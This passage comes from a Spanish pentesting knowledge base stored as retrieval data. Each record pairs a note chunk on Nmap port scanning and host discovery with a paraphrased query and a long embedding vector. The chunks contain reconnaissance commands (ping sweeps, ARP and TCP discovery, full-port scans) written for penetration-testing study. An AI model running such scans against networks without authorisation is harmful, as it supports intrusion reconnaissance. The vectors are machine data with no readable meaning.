0.03305, 0.15092, -0.00776, 0.0817, 0.12925, 0.02294, 0.01725, 0.04153, 0.00753, 0.00237, 0.04506, 0.0199, 0.02379, -0.07976, -0.0353, -0.07589, 0.04761, 0.09444, 0.00187, 0.08963, -0.1416, 0.02653, 0.10555, 0.03012, 0.06944, 0.0833, 0.00248, -0.08483, -0.09317, 0.03418, -0.03928, -0.02483, -0.02507, 0.09684, -0.03046, -0.09712, -0.06479, -0.12921, 0.02725, -0.07395, 0.03719, 0.05668, -0.01954, 0.07072, -0.08251, -0.12884, 0.08964, -0.02484, -0.1066, 0.03263, 0.00188, -0.03187, 0.03597, -0.07021, -0.04216, -0.14343, 0.02765, 0.00489, -0.0228, 0.03321, -0.02721, -0.02314, 0.04659, 0.02859, 0.15291, 0.04069, 0.00775, -0.06326, 0.03703, -0.0452, -0.04077, -0.08991, -0.05585, 0.09375, -0.05593, 0.0758, 0.00539, -0.05779, 0.13827, -0.04729, -0.01234, 0.09822, 0.0019, -0.03127, -0.02173, 0.08003, 0.08386, -0.04905, 0.07304, 0.0292, 0.07784, 0.11136, -0.11221, 0.11474, 0.01368, 0.09793, 0.01431, -0.0055, -0.03354, -0.09614, -0.04601, -0.02487, -0.06956, 0.02915, 0.09075, -0.03733, -0.12193, 0.00614, 0.03198, 0.03228, -0.04331, 0.07867, 0.05454, 0.04612, 0.00406, -0.01582, -0.02249, -0.07114, -0.04077, -0.05094, -0.02242, 0.05095, -0.11001, -0.03765, -0.02744, -0.03815, 0.06242, -0.04813, 0.02225, 0.07142, 0.00783, 0.04772, -0.08344, -0.08643, -0.06237, 0.06529, 0.015, -0.09508, 0.01542, -0.11231, 0.05293, 0.12234, -0.05245, -0.02975, 0.07424, -0.00051, 0.05791, 0.01437, 0.05372, 0.01375, -0.04899, -0.04573, 0.02807, 0.00104, 0.00914, -0.04608, 0.0974, -0.06586, -0.07336, 0.03979, 0.01422, -0.07285, -0.07708, -0.04077, 0.03162, -0.05185, 0.05843, -0.05603, -0.02798, -0.06666, -0.09096, -0.0311, -0.06556, -0.00969, 0.0671, 0.05562, 0.03115, -0.06523, 0.03211, -0.01851, -0.03683, -0.01721, 0.01591, -0.01132, -0.06161, 0.01227, 0.00625, 0.00781, -0.0516, 0.0131, -0.0003, -0.07658, 0.0398, 0.02849, 0.06315, -0.02606, -0.03123, 0.0806, -0.0465, -0.01602, 0.0231, 0.05906, -0.0138, 0.00987, -0.00398, -0.05097, 0.05341, 0.00799, 0.02473, -0.00949, 0.03066, 0.03015, 0.02038, 0.05866, 0.00955, -0.01378, 0.00967, -0.07495, -0.05015, 0.00767, 0.0211, -7e-05, -0.04588, -0.04032, -0.05814, 0.02937, 0.03004, -0.01977, -0.05225, 0.02383, -0.10132, -0.01439, -0.00155, -0.02134, -0.01925, -0.01433, 0.00201, 0.0224, -0.05191, 0.03189, -0.03408]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que alternativa hay a nmap para revisar cada puerto?", "v": [-0.008, -0.0304, -0.165, -0.12346, -0.01549, 0.01872, 0.06202, -0.10158, -0.30309, -0.0903, 0.09749, -0.05081, 0.18838, 0.0347, -0.03272, -0.06612, -0.11487, 0.11528, 0.19744, 0.04042, -0.09113, -0.01505, -0.11514, -0.02874, 0.02808, 0.05001, -0.08358, 0.07819, -0.00338, 0.00039, -0.00897, 0.0048, 0.10834, -0.02016, -0.0865, 0.07937, 0.25755, -0.02137, 0.12317, 0.00813, -0.01756, 0.10654, -0.01796, 0.05765, 0.03966, -0.10708, -0.08127, 0.03749, -0.06117, 0.05076, -0.02542, 0.10107, -0.09134, 0.01618, -0.01404, 0.02996, -0.0171, -0.03076, -0.0394, -0.10368, -0.03085, 0.03221, 0.00838, -0.15975, -0.06278, 0.00773, -0.09742, -0.00739, -0.08217, 0.02249, -0.05692, -0.0834, 0.06622, -0.01963, -0.14659, -0.11098, 0.08324, 0.01403, 0.03231, 0.01393, -0.019, -0.04242, -0.01688, 0.01778, -0.07218, -0.09802, -0.10385, -0.04701, 0.10264, -0.0314, 0.03099, -0.06304, 0.02281, 0.11261, -0.11579, 0.03338, -0.02126, -0.02499, -0.03583, 0.05575, 0.11582, 0.03852, -0.03012, -0.03388, -0.01889, 0.00893, -0.09438, 0.02267, 0.01348, 0.07276, 0.13649, 0.09116, -0.00348, -0.11405, 0.03293, -0.06143, -0.05947, -0.09185, -0.04297, -0.05939, -0.00715, -0.04631, -0.0442, -0.03985, 0.00851, 0.05143, 0.09673, -0.00465, 0.06246, 0.08463, 0.02799, -0.09499, -0.03876, -0.04213, -0.0872, -0.06709, 0.00145, -0.04767, -0.00421, 0.07936, -0.0839, 0.04119, -0.02595, -0.03448, 0.04967, -0.02977, 0.00111, -0.00507, -0.04646, -0.01312, -0.00346, 0.00419, -0.06613, 0.06641, -0.04872, 0.03565, 0.02689, -0.01792, -0.04657, 0.08447, 0.00864, -0.0504, -0.02654, 0.02622, -0.02394, -0.04999, 0.00582, 0.02994, -0.01693, -0.06642, -0.00571, 0.03191, -0.0491, -0.03163, 0.0621, 0.03843, -0.00815, -0.02545, -0.02997, 0.00345, -0.04603, 0.00227, -0.07315, -0.03687, -0.02018, -0.08129, -0.01236, 0.00045, -0.00259, 0.0742, 0.02145, 0.00665, -0.04592, -0.03666, 0.00529, 0.06361, 0.01794, -0.03827, -0.04807, -0.02261, 0.02626, 0.01828, 0.0337, -0.00998, 0.00609, -0.01435, -0.08546, 0.04862, 0.00285, 0.04236, 0.01128, 0.01046, 0.04274, 0.00763, -0.00738, -0.00246, -0.04213, 0.01982, 0.04089, 0.01291, -0.02449, 0.05401, -0.01711, 0.07139, -0.03447, 0.03516, 0.00386, 0.03943, 0.01668, 0.00358, 0.03688, 0.00912, 0.00101, 0.06634, -0.01016, 0.01501, -0.04215, 0.00808, 0.01457, -0.02967, 0.04996, -0.02263, -0.01792, 0.01838, 0.0106, -0.00221, -0.03948, 0.03892, -0.04871, 0.04331, -0.01891, 0.01042, -0.00982, -0.02802, 0.02646, 0.02718]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "como se configura nmap para detectar servicios en puertos altos?", "v": [0.14445, -0.03646, -0.21602, -0.25118, 0.0378, -0.11153, 0.10601, -0.03216, -0.24759, -0.09344, -0.10243, 0.04116, 0.01972, -0.12032, -0.00937, -0.07206, -0.00665, -0.06039, 0.09896, 0.04076, -0.09298, -0.02711, -0.00677, -0.00526, -0.00303, 0.04178, 0.03932, -0.05387, -0.07482, 0.01454, -0.00337, -0.06218, 0.03392, 0.02093, -0.02391, -0.03161, -0.02101, -0.06594, 0.07982, 0.06447, 0.02139, 0.03335, 0.03312, -0.00751, 0.16977, -0.01888, -0.07335, -0.09885, 0.08304, -0.03865, 0.00887, 0.02507, -0.11216, -0.02397, -0.06066, -0.01444, 0.03915, 0.0371, 0.08318, -0.15946, -0.04528, 0.05646, -0.07184, -0.01686, -0.00051, -0.08918, -0.04822, -0.02089, -0.0121, -0.06862, -0.02306, -0.09825, 0.05475, 0.04393, 0.11469, 0.01003, 0.04815, -0.04238, 0.2002, 0.03913, 0.01996, -0.025, -0.13028, -0.06453, -0.1466, -0.09129, -0.09542, 0.005, 0.09603, -0.08477, 0.12333, -0.01765, -0.00536, 0.0635, -0.03117, 0.01016, 0.01706, -0.00319, -0.01456, 0.0038, 0.06095, 0.10196, -0.05489, 0.11757, -0.04475, 0.01362, 0.02489, -0.0482, 0.06799, -0.04155, 0.09724, 0.0575, -0.004, -0.10975, -0.02311, -0.09756, 0.08536, -0.05074, -0.03673, 0.00114, -0.05015, -0.07162, 0.03267, 0.01763, -0.03664, 0.00921, -0.00042, 0.03243, 0.08625, 0.08305, 0.02657, -0.04678, -0.02112, -0.06435, -0.05135, -0.03284, -0.00306, -0.09713, -0.04201, 0.02474, -0.04512, 0.06859, -0.04888, -0.00543, 0.08167, 0.02257, -0.00909, 0.02287, -0.04105, -0.00906, 0.01771, 0.07503, -0.07936, -0.00701, -0.09355, 0.02746, 0.03703, -0.06152, -0.05214, 0.05202, -0.03224, -0.014, 0.05622, 0.00832, 0.08959, 0.0073, 0.0206, 0.04315, 0.11359, -0.01753, -0.09637, -0.01839, 0.00286, -0.14106, 0.0325, 0.051, 0.01106, -0.04201, 0.00199, 0.01928, -0.0495, -0.02692, 0.02791, -0.03802, -0.09459, -0.0671, -0.00266, -0.07588, -0.0087, 0.03614, 0.05859, -0.03312, -0.05363, 0.04837, 0.03474, 0.0234, -0.02009, -0.0243, -0.02505, -0.01215, 0.0506, -4e-05, 0.01972, -0.00555, -0.0355, -0.00823, -0.08327, 0.06337, 0.03886, 0.07372, 0.00148, -0.00021, 0.0535, -0.04717, -0.0724, 0.04028, -0.00404, 0.03966, 0.01974, 0.02598, -0.07141, 0.01518, 0.01893, 0.01437, -0.0079, -0.00352, 0.0305, 0.03073, 0.07984, 0.01685, 0.02788, -0.01569, -0.0379, 0.01147, -0.01828, -0.03829, 0.02891, -0.02484, 0.00657, -0.02539, 0.06234, -0.01433, 0.02902, -0.05625, 0.07275, -0.04597, -0.02101, -0.00039, 0.00097, 0.02214, -0.02679, 0.05449, 0.02115, -0.05327, 0.0233, 0.00872]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "que herramienta sirve para detectar versiones de los servicios en una red", "v": [0.03634, 0.02276, -0.18694, -0.26544, 0.06025, -0.13616, -0.13418, -0.03524, 0.07944, -0.07928, -0.11238, -0.18304, -0.05651, -0.15839, 0.185, 0.0425, 0.02063, -0.14103, 0.063, -0.03668, 0.01264, -0.01774, -0.08014, -0.01099, -0.05944, 0.08287, 0.07869, -0.10669, -0.10889, 0.10683, 0.00761, -0.07606, 0.00736, -0.05522, -0.18081, -0.022, -0.02681, -0.02436, -0.02229, 0.0922, 0.02956, 0.03962, 0.00309, 0.04625, 0.05444, -0.0048, -0.02295, 0.00788, 0.01229, 0.12396, 0.00181, -0.1572, -0.19656, -0.03591, -0.04511, -0.14824, 0.09306, -0.05175, -0.02112, -0.10619, -0.08247, -0.0129, -0.06597, 0.00882, 0.06751, -0.08748, -0.02994, -0.03003, -0.02752, 0.03047, -0.03578, 0.03717, 0.0802, 0.02092, -0.05453, -0.01569, 0.01477, -0.00042, 0.05328, -0.03632, 0.05037, 0.04996, -0.08813, 0.04138, -0.03859, -0.08501, 0.06044, -0.02958, 0.0638, -0.11856, 0.00746, 0.08368, 0.01802, 0.01902, 0.02809, 0.00767, 0.13584, -0.09521, 0.0108, -0.0361, 0.14201, -0.05792, -0.07335, 0.03216, -0.02889, 0.00714, 0.01994, -0.01168, -0.04295, -0.0395, 0.05743, -0.03631, 0.02984, 0.00295, 0.02103, 0.02764, 0.05028, 0.00519, -0.04525, 0.01476, 0.00037, 0.00988, -0.07824, -0.06196, 0.0188, -0.06359, -0.07745, 0.01247, 0.00709, -0.06905, -0.00059, -0.0344, -0.07767, -0.03012, -0.03154, 0.02811, 0.02324, -0.12406, -0.0204, -0.02487, -5e-05, 0.06243, -0.05897, -0.07033, 0.02149, 0.05781, 0.03491, -0.01033, 0.0184, 0.01306, 0.01949, -0.05513, -0.05928, 0.01178, -0.053, -0.00359, -0.00114, 0.00539, -0.0926, 0.07158, -0.02451, -0.05577, 0.06728, 0.00402, 0.00323, -0.01913, 0.05594, 0.02698, 0.12024, 0.02616, 0.00928, 0.01205, 0.04466, -0.06442, -0.03474, -0.0451, -0.04179, -0.03123, 0.02967, -0.06777, 0.00025, -0.0458, -0.05215, -0.03858, 0.02743, -0.05044, -0.0119, -0.0468, -0.01122, -0.05311, 0.02102, -0.01622, 0.01591, -0.01684, 0.0727, 0.06823, 0.00895, -0.04475, 0.02457, -0.03393, -0.11748, -0.02153, -0.0565, 0.0091, -0.01299, 0.03955, 0.02295, 0.06324, 0.02871, 0.0529, -0.00386, 0.06308, 0.00257, -0.01521, -0.03575, -0.04762, 0.00828, 0.00847, 0.02429, -0.00563, 0.03349, -0.05165, 0.00402, 0.0148, -0.03223, 0.00052, 0.03504, -0.03155, 0.04467, -0.00775, 0.07923, -0.01684, 0.00276, 0.01322, -0.034, -0.12636, 0.08837, 0.02616, -0.05851, -0.08432, -0.0025, 0.04301, 0.02101, -0.01598, 0.01739, -0.04975, 0.02157, -0.0449, 0.01896, -0.05663, -0.06028, 0.04254, 0.06581, -0.06137, 0.01724, 0.00273]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "con que puedo hacer un escaneo de puertos y ver quΓ© protocolos estΓ‘n activos", "v": [0.09404, 0.03459, -0.15201, 0.01432, 0.10881, -0.04705, 0.25268, -0.1615, -0.14033, -0.08676, -0.07509, 0.09289, 0.08072, -0.02143, 0.04823, 0.00014, 0.02367, -0.00492, 0.10317, 0.11946, -0.09022, -0.03008, -0.08137, 0.03651, 0.07741, 0.06728, 0.03677, 0.09193, -0.04715, 0.0287, -0.0464, 0.05805, 0.12485, -0.03692, 0.10893, -0.04762, 0.04922, -0.00689, 0.06285, 0.11281, -0.06009, 0.00807, -0.08592, -0.19197, 0.12614, -0.04425, -0.1121, -0.13008, 0.00765, -0.03447, -0.06206, 0.02462, -0.09371, 0.0003, -0.03335, 0.06792, 0.06534, 0.0194, 0.03476, -0.09626, -0.08382, 0.11035, 0.0994, -0.03838, -0.04183, -0.05603, 0.02694, 0.08109, -0.06628, 0.05138, -0.00909, -0.0177, 0.02686, 0.08469, 0.00139, -0.04837, -0.00714, -0.06776, -0.01396, 0.10572, -0.0206, 0.04721, -0.00399, 0.0261, -0.08012, -0.09974, -0.08198, -0.04285, 0.03815, -0.162, 0.00963, -0.04695, -0.01407, 0.04808, 0.0131, 0.05349, 0.00116, 0.10231, 0.03478, 0.04781, 0.02346, 0.03666, -0.11959, 0.10057, 0.06102, 0.02104, 0.02284, -0.03293, 0.04454, 0.01178, -0.00999, 0.0266, 0.02187, -0.07238, -0.04067, 0.1, -0.07469, -0.09097, -0.02371, 0.07339, -0.01801, -0.08328, -0.04371, 0.02169, 0.00941, -0.01961, -0.01738, 0.12742, 0.07972, 0.00556, -0.03222, -0.0316, -0.06719, -0.11013, -0.08334, -0.07318, 0.01393, -0.04143, -0.03775, -0.04369, -0.05293, 0.07849, -0.05512, 0.00731, 0.02754, -0.00499, 0.04486, -0.0414, -0.12938, -0.01195, 0.05212, 0.04823, -0.06986, 0.03831, -0.10169, 0.00039, 0.10495, -0.02339, -0.00599, 0.07975, -0.02694, 0.04692, -0.06021, 0.04563, 0.01963, -0.01383, -0.08613, -0.02808, -0.06274, -0.0126, -0.04366, 0.08198, -0.05321, -0.0823, 0.06569, 0.01948, -0.03731, -0.04533, 0.00974, -0.06601, -0.05228, 0.05206, -0.00289, -0.04516, -0.01437, -0.08716, -0.00825, -0.03191, 0.00026, 0.08172, 0.0163, 0.05934, -0.02431, 0.04393, -0.03323, -0.00609, -0.02721, 0.04997, 0.02346, -0.05664, 0.05177, 0.0035, 0.06353, -0.05977, 0.0411, 0.04368, -0.12388, 0.04464, -0.00828, 0.069, 0.03751, -0.01073, 0.07779, -0.015, -0.06525, 0.01368, -0.0443, 0.04161, 0.02365, 0.02319, -0.0121, 0.02113, -0.00098, -0.018, -0.00612, 0.00792, 0.04964, 0.02645, 0.05236, 0.04665, 0.02219, 0.00188, -0.07819, -0.02849, 0.0275, 0.08288, 0.00426, -0.02244, -0.00145, 0.00049, 0.03734, 0.0019, -0.01652, -0.03444, 0.04992, -0.03852, -0.036, 0.04369, 0.01058, -0.04006, -0.03129, 0.02426, 0.05873, -0.0261, 0.02889, -0.07055]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap\n\n> `-sS` = TCP SYN Β· `-sU` = UDP Β· `-sV` = versiΓ³n. Parte de EnumeraciΓ³n.", "indexar": "cual es una alternativa libre a nmap para mapear redes", "v": [-0.00906, -0.0108, -0.00529, -0.09411, -0.14032, 0.06929, -0.11895, 0.02481, -0.22883, -0.0561, 0.0135, -0.21843, 0.08061, -0.02959, 0.00256, 0.06618, -0.0455, 0.04385, 0.26267, -0.03578, -0.10919, 0.0267, -0.19456, -0.07766, -0.0861, 0.00614, 0.016, 0.00856, -0.16361, -0.04249, -0.06922, -0.03577, 0.01446, -0.06228, -0.05881, 0.02457, 0.21597, 0.01443, 0.01215, -0.06161, -0.04661, -0.03003, -0.08087, 0.09652, 0.01143, 0.00411, -0.12558, -0.00384, -0.01708, 0.04883, -0.07083, -0.01284, -0.14622, 0.00845, -0.01055, 0.00666, 0.09203, -0.11707, -0.05688, 0.02406, -0.07881, 0.00079, -0.04073, -0.1232, 0.03302, -0.0476, -0.00978, -0.00158, -0.09666, 0.07215, 0.09469, 0.06643, 0.07179, -0.01035, -0.08067, 0.09692, -0.0567, -0.06057, 0.01178, 0.09438, 0.07154, -0.05184, -0.08781, 0.01872, -0.04272, -0.03432, 0.06818, -0.06666, 0.02484, 0.01337, 0.02487, 0.09374, -0.02093, 0.11425, 8e-05, -0.10291, -0.07912, -0.00382, -0.03939, 0.03479, 0.01527, 0.08392, -0.10617, 0.00126, -0.03227, -0.02845, -0.01949, 0.10486, -0.04246, 0.02351, 0.10728, 0.0948, -0.0879, 0.03416, 0.03412, -0.05385, 0.00015, 0.07192, 0.00577, -0.02639, -0.02002, 0.01477, -0.0206, -0.03545, 0.05135, 0.12463, 0.0208, 0.06538, 0.04035, 0.06178, 0.02885, 0.00603, -0.03203, -0.10229, -0.08574, -0.04278, -0.01408, -0.08131, -0.01391, 0.04244, -0.10594, -0.05125, -0.06118, -0.09254, 0.01597, 0.04225, 0.06197, -0.08129, -0.01859, -0.00567, -0.02317, 0.06374, -0.07274, 0.05441, 0.00578, 0.10911, -0.11521, -0.04491, -0.07463, 0.07852, 0.03085, -0.03601, 0.01879, 0.02362, 0.00836, 0.01543, -0.02402, 0.03385, -0.02971, -0.01187, -0.04209, 0.08259, 0.02369, -0.088, 0.04609, -0.00602, -0.00497, -0.01341, 0.02136, -0.00281, -0.01188, -0.05619, -0.01404, 0.03831, -0.05101, -0.02664, 0.03771, 0.05211, -0.01471, 0.01816, -0.07578, 0.03261, -0.00451, 0.00731, 0.04667, -0.04868, 0.07229, -0.03499, -0.02612, -0.01192, -0.05051, -0.0171, -0.01605, 0.01857, -0.07675, 0.00146, -0.01029, -0.01909, 0.00392, 0.06824, 0.01428, -0.02513, 0.05048, -0.01279, -0.03593, -0.00093, 0.04302, -0.01586, 0.01295, -0.02482, 0.05148, 0.04275, 0.00628, 0.04398, -0.01805, 0.04515, -0.01924, -0.01914, -0.03293, -0.04914, 0.06526, -0.06217, -0.00205, 0.02797, -0.02099, -0.03591, -0.00073, 0.01898, 0.03154, -0.0109, 0.03918, 0.02843, -0.03668, 0.02111, -0.04833, -0.01232, -0.05886, -0.03133, -0.05704, -0.03482, -0.02144, -0.00482, 0.04261, 0.04219, 0.03167, 0.0184]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "que programa sirve para descubrir quΓ© dispositivos estΓ‘n activos en mi red local?", "v": [0.03235, 0.16006, -0.16494, -0.17624, 0.14116, -0.09197, -0.07783, -0.04799, -0.05263, -0.13153, -0.06117, -0.18505, -0.06067, -0.07832, 0.17338, -0.0507, 0.02407, -0.125, 0.12421, 0.00467, -0.01557, 0.00863, -0.09434, 0.03594, 0.06451, 0.13628, 0.12971, 0.00156, -0.07435, 0.02913, 0.08044, -0.00246, 0.01158, -0.09755, -0.06312, -0.00675, 0.04481, -0.01961, -0.06649, 0.03616, -0.00073, -0.03736, -0.00446, -0.01036, 0.13043, 0.03741, -0.03982, -0.12901, -0.12356, 0.09512, -0.10147, 0.04295, -0.05483, -0.03223, 0.02007, -0.05008, -0.04489, -0.1269, -0.02746, -0.01649, -0.06821, -0.05269, -0.0256, -0.05029, 0.11276, -0.06227, 0.0601, 0.12798, -0.02387, 0.02164, 0.02545, -0.01923, 0.06966, 0.0424, -0.01972, 0.11007, 0.03041, -0.09621, 0.07483, 0.01017, 0.04972, 0.08222, 0.03002, 0.06728, -0.00295, -0.07084, 0.09023, -0.07732, 0.00033, -0.08033, 0.00142, 0.02496, 0.0514, 0.09144, -0.02488, 0.01006, 0.08989, 0.0689, 0.03842, 0.09326, 0.04998, -0.05329, -0.11929, 0.06183, 0.00694, 0.06432, 0.0384, 0.01573, 0.05298, 0.01806, 0.0265, -0.068, 0.01404, -0.03776, -0.04802, 0.08582, 0.01097, -0.01241, 0.02017, 0.014, -0.08183, 0.0419, -0.02769, -0.02202, 0.09311, -0.0055, -0.07543, 0.01317, 0.02883, 0.06435, 0.06867, -0.02017, 0.06093, -0.07197, -0.0951, -0.07464, 0.0277, -0.00468, -0.03876, -0.03376, 0.05433, 0.03637, -0.02884, -0.03305, 0.0511, 0.04599, 0.09366, 0.0129, 0.03041, 0.08273, -0.01114, -0.03693, -0.0637, 0.04174, -0.05879, 0.04779, 0.09904, -0.02884, -0.09801, 0.09959, -0.05928, -0.02565, -0.04886, -0.01933, -0.04098, -0.07758, -0.02352, 0.02503, 0.11279, 0.04074, -0.08095, 0.06342, 0.02762, -0.09083, 0.00649, -0.01716, 0.04205, -0.04, 0.08651, -0.07917, -0.04132, 0.04953, 0.06381, 0.02537, -0.02033, -0.03883, -0.0307, -0.01324, -0.03505, -0.02493, -0.02276, -0.0175, 0.02711, 0.03606, 0.05567, -0.00941, -0.03192, -0.00332, 0.01406, -0.04094, -0.05066, 0.00432, 0.00676, 0.03182, 0.06749, 0.10564, -0.03295, 0.05116, 0.00998, 0.08966, -0.01454, 0.01047, 0.11024, 0.06138, -0.06656, -0.03622, 0.00801, 0.06781, 0.02638, 0.02828, 0.09101, -0.04683, 0.01298, 0.04714, -0.0072, -0.0421, 0.03046, -0.02015, 0.03702, -0.00289, 0.03948, -0.05872, -0.05543, 0.02607, -0.01261, -0.01992, 0.06724, 0.02819, 0.00915, -0.03356, -0.01158, 0.07717, 0.01375, -0.06382, -0.04574, 0.02877, -0.05352, -0.01516, -0.00128, -0.03764, -0.04446, 0.04316, 0.09042, -0.02839, 0.04008, 0.06344]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "con quΓ© puedo hacer un escaneo rΓ‘pido de direcciones para ver quiΓ©n estΓ‘ vivo?", "v": [-0.21785, 0.01074, -0.23348, 0.10274, -0.00817, -0.0584, -0.03242, -0.14421, -0.01507, -0.16332, -0.04463, -0.15833, -0.08837, -0.13698, 0.11061, 0.09044, 0.11505, 0.09767, 0.17517, 0.07959, -0.03785, -0.06308, -0.07607, -0.00777, -0.01893, 0.04751, 0.0223, 0.12281, -0.11425, -0.03029, -0.0339, 0.01292, 0.03621, 0.01787, 0.02356, 0.04799, 0.14083, 0.05829, 0.03592, 0.15936, -0.01052, -0.02695, -0.05372, -0.10446, 0.00988, -0.10526, -0.02766, -0.09841, -0.04521, -0.02968, -0.07629, -0.00484, -0.11281, -0.05507, -0.12487, -0.02567, 0.02223, -0.08592, 0.13439, -0.06433, -0.09144, 0.02076, 0.0238, 0.02987, -0.08394, -0.06019, -0.0132, -0.0011, -0.04764, -0.01337, -0.06417, -0.01862, 0.08874, 0.12729, -0.06052, 0.01018, -0.02726, -0.02057, 0.02173, 0.09927, 0.04288, 0.05579, -0.13879, 0.02087, -0.04061, 0.03319, -0.00321, -0.01643, -0.05046, -0.10054, 0.04019, 0.02287, 0.00056, 0.04317, 0.07493, 0.05312, 0.00736, 0.01315, 0.00137, 0.03449, -0.00657, -0.02507, -0.22512, 0.12823, 0.001, 0.05531, -0.00701, -0.01912, -0.14411, 0.05118, 0.00972, 0.04162, -0.07732, -0.05644, -0.01592, 0.05714, -0.04992, 0.02565, -0.01323, 0.03249, -0.10691, -0.03987, 0.02425, -0.03927, 0.04161, 0.02551, 0.00357, 0.05702, 0.02551, 0.0416, -0.03913, -0.06607, -0.02852, -0.14838, 0.04362, -0.00754, 0.02427, -0.05208, -0.00213, -0.0019, 0.00692, 0.00208, -0.01983, -0.1105, -0.09113, -0.00065, -0.01315, -0.04389, -0.10304, 0.0196, 0.03973, -0.01253, -0.02587, 0.00223, 0.00692, -0.09606, 0.01212, -0.0186, -0.00903, -0.01363, 0.00118, 0.0041, -0.06602, 0.00982, -0.04131, -0.08066, -0.06511, 0.02409, -0.04575, 0.06248, -0.00343, 0.09045, -0.07414, -0.07726, 0.04572, -0.01507, 0.02905, -0.03746, 0.03708, -0.01438, 0.01869, 0.04852, -0.00275, -0.0018, -0.00193, -0.02886, 0.0064, 0.04791, -0.05299, 0.09911, 0.03006, 0.04046, -0.00551, 0.01126, -0.01059, 0.00715, 0.04211, -0.06672, -0.063, -0.05196, -0.04857, -0.02861, -0.02503, 0.01549, 0.0814, -0.01437, -0.07893, 0.02181, 0.0052, 0.05355, -0.04041, 0.01332, 0.02893, -0.01563, -0.05166, 0.04343, -0.0192, -0.07272, 0.01409, 0.01745, -0.00387, 0.01186, 0.00784, -0.00285, -0.00122, 0.03211, 0.02648, -0.04552, 0.04943, 0.03966, -0.01804, -0.02279, 0.01064, -0.02789, 0.03523, -0.01531, -0.01608, 0.04002, -0.01891, -0.00574, 0.03042, 0.06973, -0.03449, 0.01418, -0.00893, 0.01768, -0.0692, 0.01317, -0.05136, -0.08453, -0.02044, -0.00223, 0.02979, 0.00208, 0.01508, -0.03523]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "si el firewall bloquea los pings, hay alguna alternativa para detectar otros equipos en la LAN?", "v": [-0.01706, 0.00799, -0.13434, -0.25862, -0.16502, -0.0948, -0.04818, 0.01266, -0.09353, -0.02542, -0.00033, -0.06052, -0.02121, 0.03726, 0.1677, 0.01067, -0.14077, -0.06762, 0.09905, -0.21384, -0.07452, 0.04072, -0.03543, -0.02144, -0.01858, -0.04961, -0.0811, 0.01047, -0.13687, -0.05413, 0.02359, -0.05928, 0.1323, 0.06535, -0.08874, 0.05029, 0.05408, 0.04339, 0.17773, 0.03202, -0.05779, 0.00252, -0.05116, -0.0692, 0.01123, -0.0561, -0.02902, 0.0234, 0.15086, -0.03936, -0.07004, -0.04058, -0.05722, -0.04969, 0.04748, -0.01466, 0.16972, -0.0191, 0.0477, -0.06297, -0.17991, -0.01143, -0.00079, -0.05134, 0.06272, 0.05988, -0.09082, -0.10141, -0.0191, -0.05519, 0.00162, -0.03162, 0.03058, -0.07354, 0.03532, 0.06563, 0.01614, 0.04035, 0.1018, 0.0618, -0.01416, 0.02241, 0.06991, 0.00811, -0.04604, -0.0671, -0.10573, -0.04501, -0.01831, -0.11986, 0.10245, 0.12058, -0.06412, -0.04811, 0.03916, -0.02375, 0.0691, 0.09667, -0.03313, -0.02736, 0.0017, 0.00805, -0.08469, 0.16481, 0.09786, -0.04938, -0.05291, -0.02085, 0.03599, -0.08007, -0.0586, 0.03069, -0.03722, -0.04912, -0.02005, -0.06313, 0.01532, -0.01094, 0.07967, 0.01352, 